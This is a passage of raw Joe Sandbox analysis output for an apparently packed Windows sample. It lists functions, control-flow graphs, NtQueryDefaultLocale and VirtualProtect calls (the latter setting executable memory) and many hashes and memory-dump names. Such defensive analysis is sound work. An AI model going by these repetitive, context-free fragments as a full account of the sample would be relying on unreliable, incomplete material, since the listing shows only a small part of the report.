                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: DefaultLocaleQuery
                                                                                                                                                                                                                                                                                                • String ID: 639;$J86;$L$L$W$a$a$b$d$i$o$r$r$y
                                                                                                                                                                                                                                                                                                • API String ID: 2949231068-3491020230
                                                                                                                                                                                                                                                                                                • Opcode ID: 4ddf89da998eefb8505f89a636a61c237bfbb09b0b1cbd33e02ee9240a7bcf3b
                                                                                                                                                                                                                                                                                                • Instruction ID: 439e1dca2067285d06cf6f6a4178ed39b7b36ef521786ade533f23034682b911
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4ddf89da998eefb8505f89a636a61c237bfbb09b0b1cbd33e02ee9240a7bcf3b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DE12BCB1E092688FFB208B14DC44BEAB7B6EB81304F1441FAD44DA7281D7395ED68F56
                                                                                                                                                                                                                                                                                                Function 00447F20 Relevance: 26.7, APIs: 1, Strings: 14, Instructions: 451nativeCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 81 447f20-447fa4 87 448078-448771 81->87 88 447faa-448035 81->88 94 448777-448788 NtQueryDefaultLocale 87->94 88->87 93 448037-448073 88->93 93->94 97 448950-4491d6 call 448d09 call 44919b call 4491d7 94->97 98 44878e-4487e1 call 4487d3 94->98 110 4487f2-448817 98->110 114 448824 110->114 115 448819-448822 110->115 117 448853-4488de call 4488be 114->117 118 4487e3-4487ec 114->118 115->117 126 4488ef-448914 117->126 118->110 130 448916-44891f 126->130 131 448921 126->131 130->97 131->97 133 4488e0-4488e9 131->133 133->126
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 00448780
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: DefaultLocaleQuery
                                                                                                                                                                                                                                                                                                • String ID: 639;$J86;$L$L$W$a$a$b$d$i$o$r$r$y
                                                                                                                                                                                                                                                                                                • API String ID: 2949231068-3491020230
                                                                                                                                                                                                                                                                                                • Opcode ID: cc41fd67b7d7193735979c5cb51afd4988cfeda4df8e219116f1c024732d6afa
                                                                                                                                                                                                                                                                                                • Instruction ID: 6eb529afb54c6f67b06e8446c300daf3170ac217e2b5d8fcea4f0faedfee5f04
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cc41fd67b7d7193735979c5cb51afd4988cfeda4df8e219116f1c024732d6afa
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D02E1B2D055688AF7208A14DC44BEABBB5FB90310F1041FED44D97281E77D1EC68F66
                                                                                                                                                                                                                                                                                                Function 00448357 Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 325nativeCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 141 448357-448788 NtQueryDefaultLocale 146 448950-4491d6 call 448d09 call 44919b call 4491d7 141->146 147 44878e-4487e1 call 4487d3 141->147 159 4487f2-448817 147->159 163 448824 159->163 164 448819-448822 159->164 166 448853-4488de call 4488be 163->166 167 4487e3-4487ec 163->167 164->166 175 4488ef-448914 166->175 167->159 179 448916-44891f 175->179 180 448921 175->180 179->146 180->146 182 4488e0-4488e9 180->182 182->175
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 00448780
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: DefaultLocaleQuery
                                                                                                                                                                                                                                                                                                • String ID: 639;$J86;$L$L$W$a$a$b$d$i$o$r$r$y
                                                                                                                                                                                                                                                                                                • API String ID: 2949231068-3491020230
                                                                                                                                                                                                                                                                                                • Opcode ID: 8052c4c15bfba9244f1a1d6433a695cbe35de3090c29ea8e0d1fbbfb1ac673c8
                                                                                                                                                                                                                                                                                                • Instruction ID: f749d1ef7976965f2d03fd900c1d26fecdf9e34fab5d890f5e44a7de845755b5
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8052c4c15bfba9244f1a1d6433a695cbe35de3090c29ea8e0d1fbbfb1ac673c8
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C4C1D1B1D095688AFB208A14DC44BEA7BB5FB90314F1480FED44DA7281E77D1EC68F66
                                                                                                                                                                                                                                                                                                Function 0044F92B Relevance: 1.9, APIs: 1, Instructions: 430memoryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 249 44f92b-44f98d 252 44f9a0-44f9b5 249->252 253 44f98f-44f99b 249->253 255 44f9b7-44f9c3 252->255 256 44f9c8-44f9e7 252->256 254 44fc91-44fcbc VirtualProtect 253->254 262 44fcfc-44fd02 254->262 263 44fcbe-44fcfa 254->263 255->254 257 44f9e9-44f9f5 256->257 258 44f9fa-44fa0c 256->258 257->254 260 44fa0e-44fa1a 258->260 261 44fa1f-44fa88 258->261 260->254 266 44fc85-44fc8b 261->266 267 44fa8e-44fab9 261->267 264 44fd08-44fd0f 262->264 263->264 268 44fd11-44fd43 call 44fd24 call 44fd3f 264->268 269 44fd48-44feec call 44feed 264->269 266->254 271 44fabb-44fafa 267->271 284 450291-45068a call 45036d call 450673 268->284 269->284 277 44fb00-44fb10 271->277 278 44fb9b-44fbba call 44fbc9 271->278 277->278 281 44fb16-44fb2e call 44fb2a 277->281 290 44fbbf-44fbd0 278->290 281->271 300 450690-450804 call 450805 284->300 301 450f9c-4510ac call 450fac call 450fc2 call 4510bb 284->301 290->266
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • VirtualProtect.KERNELBASE(?,?,00000040,-00001BDD), ref: 0044FCB4
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: c1b97181995b5b873ef6c82a174a1881c8664ab46c72109f017296002eab23a4
                                                                                                                                                                                                                                                                                                • Instruction ID: 32ec1135f72467027d19faaf1e89592854ee1bb49cbce978dd1a75d24d84a3ca
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c1b97181995b5b873ef6c82a174a1881c8664ab46c72109f017296002eab23a4
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9702E0B0D041588BFB24CB24CC54BEABBB5EB51304F0481EAD44D67282DA795FC9CF66
                                                                                                                                                                                                                                                                                                Function 0044EFA9 Relevance: 1.9, APIs: 1, Instructions: 422memoryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 318 44efa9-44efb6 319 44efd0-44efe0 318->319 320 44efb8-44efce 318->320 322 44efe6-44eff9 319->322 323 44eeef-44efa8 call 44efa9 319->323 321 44f033-44f03a 320->321 326 44f07c-44f0c8 321->326 327 44f03c-44f07a 321->327 322->323 325 44efff-44f00f 322->325 329 44f011-44f01b 325->329 330 44f01d 325->330 332 44f0da 326->332 333 44f0ca-44f0d4 326->333 331 44f0e4-44f11d 327->331 337 44f027-44f02d 329->337 330->337 335 44f160-44f1be call 44f179 331->335 336 44f11f-44fcbc VirtualProtect 331->336 332->331 333->332 338 44ee90-44eead call 44eeb0 333->338 350 44f1c0-44f1cc 335->350 351 44f1d1-44f1e6 335->351 346 44fcfc-44fd02 336->346 347 44fcbe-44fcfa 336->347 337->321 338->331 349 44fd08-44fd0f 346->349 347->349 355 44fd11-44fd43 call 44fd24 call 44fd3f 349->355 356 44fd48-44feec call 44feed 349->356 352 44f4c2-44f4c9 350->352 353 44f1e8-44f1f4 351->353 354 44f1f9-44f218 351->354 358 44f59d-44f5a8 call 44f5ab 352->358 359 44f4cf-44f4e3 call 44f4e4 352->359 353->352 361 44f21a-44f226 354->361 362 44f22b-44f23d 354->362 379 450291-45068a call 45036d call 450673 355->379 356->379 359->358 361->352 367 44f250-44f2b9 362->367 368 44f23f-44f24b 362->368 374 44f4b6-44f4bc 367->374 375 44f2bf-44f309 367->375 368->352 374->352 378 44f31a-44f32b 375->378 381 44f331-44f341 378->381 382 44f3cc-44f3ec call 44f3ee 378->382 404 450690-450804 call 450805 379->404 405 450f9c-4510ac call 450fac call 450fc2 call 4510bb 379->405 381->382 385 44f347-44f398 call 44f366 381->385 382->374 396 44f3be 385->396 397 44f39a-44f3bc 385->397 396->378 397->396 399 44f3c5 397->399 399->382
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • VirtualProtect.KERNELBASE(?,?,00000040,-00001BDD), ref: 0044FCB4
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: faddcc2d970d42f849a0a2fff6793f716e50b79d1e25d1082c8f04408cb994ac
                                                                                                                                                                                                                                                                                                • Instruction ID: a1e62c07b9328105f4749d86f6e54d627f67d8c919ce3bf7fc6f258ad57a79d4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: faddcc2d970d42f849a0a2fff6793f716e50b79d1e25d1082c8f04408cb994ac
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 48F103B1D041698AF7248B25CC44BEA7AB5EF51304F0480FAD84D67281D67D5FCACF66
                                                                                                                                                                                                                                                                                                Function 00438BE1 Relevance: 1.8, APIs: 1, Instructions: 322COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 422 438be1-438c0b 423 438c1d-438c20 422->423 424 438c0d-438c17 422->424 427 438c27-438c60 423->427 424->423 425 4389e8-438a6d call 438a72 424->425 425->427 430 438c66-438d2c call 438d2d 427->430 431 43955e-439ca6 call 4395e6 call 4398ff call 439918 call 439c6b VirtualProtect 427->431 458 439ca8-439ce6 431->458 459 439cee-439d40 call 439d41 431->459 458->459
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: fe847013d1d4759e7af2f403e4aff0b5d11dee58bb02051e9359444303efbe60
                                                                                                                                                                                                                                                                                                • Instruction ID: 0497523d0196481c722b770e85ac41abb136698388dd891311d3e2aa80c44b90
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fe847013d1d4759e7af2f403e4aff0b5d11dee58bb02051e9359444303efbe60
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B2C103B2D056199BF7208B24DC50BEBB775EF94310F1451FAE44DA7380EA390EC28B56
                                                                                                                                                                                                                                                                                                Function 0044EE47 Relevance: 1.8, APIs: 1, Instructions: 265memoryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 465 44ee47-44ee73 467 44ee84-44eead call 44eeb0 465->467 468 44ee75-44ee7f 465->468 470 44f0e4-44f11d 467->470 468->470 472 44f160-44f1be call 44f179 470->472 473 44f11f-44fcbc VirtualProtect 470->473 483 44f1c0-44f1cc 472->483 484 44f1d1-44f1e6 472->484 479 44fcfc-44fd02 473->479 480 44fcbe-44fcfa 473->480 482 44fd08-44fd0f 479->482 480->482 488 44fd11-44fd43 call 44fd24 call 44fd3f 482->488 489 44fd48-44feec call 44feed 482->489 485 44f4c2-44f4c9 483->485 486 44f1e8-44f1f4 484->486 487 44f1f9-44f218 484->487 491 44f59d-44f5a8 call 44f5ab 485->491 492 44f4cf-44f4e3 call 44f4e4 485->492 486->485 494 44f21a-44f226 487->494 495 44f22b-44f23d 487->495 512 450291-45068a call 45036d call 450673 488->512 489->512 492->491 494->485 500 44f250-44f2b9 495->500 501 44f23f-44f24b 495->501 507 44f4b6-44f4bc 500->507 508 44f2bf-44f309 500->508 501->485 507->485 511 44f31a-44f32b 508->511 514 44f331-44f341 511->514 515 44f3cc-44f3ec call 44f3ee 511->515 537 450690-450804 call 450805 512->537 538 450f9c-4510ac call 450fac call 450fc2 call 4510bb 512->538 514->515 518 44f347-44f398 call 44f366 514->518 515->507 529 44f3be 518->529 530 44f39a-44f3bc 518->530 529->511 530->529 532 44f3c5 530->532 532->515
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • VirtualProtect.KERNELBASE(?,?,00000040,-00001BDD), ref: 0044FCB4
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
